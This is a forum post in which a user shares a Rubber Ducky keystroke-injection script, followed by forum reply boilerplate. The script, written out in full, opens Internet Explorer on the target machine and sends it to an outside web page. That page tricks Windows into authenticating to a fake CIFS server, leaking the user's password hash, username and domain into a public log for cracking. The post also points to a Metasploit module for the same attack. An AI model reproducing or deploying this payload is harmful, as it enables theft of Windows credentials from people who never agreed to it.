Jump to content

[Payload] First simple script


bwall

Recommended Posts

I got a Rubber Ducky for xmas, and figured I would start with a simple script before I went into encoded binaries. So as far as useful, I figured I would a testing file I have up on my server which tricks IE into trying to connect to a fake CIFS server, sending a double salted hash of the user's password on the Windows box, along with the username and domain.

This information is then dumped to a web readable file.

DELAY 1000
CONTROL ESCAPE
DELAY 50
STRING iexplore.exe http://firebwall.com/test.html
ENTER
DELAY 2000
ALT f
STRING x
REM http://firebwall.com/hashlog.txt will show the exchange that you can run password cracking on

I have a custom CIFS server up, but there is a metasploit module you can run on your own. If you do not wish to make your IP, password hash, username and domain publicly available, do not go to test.html with anything other than wget or curl.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...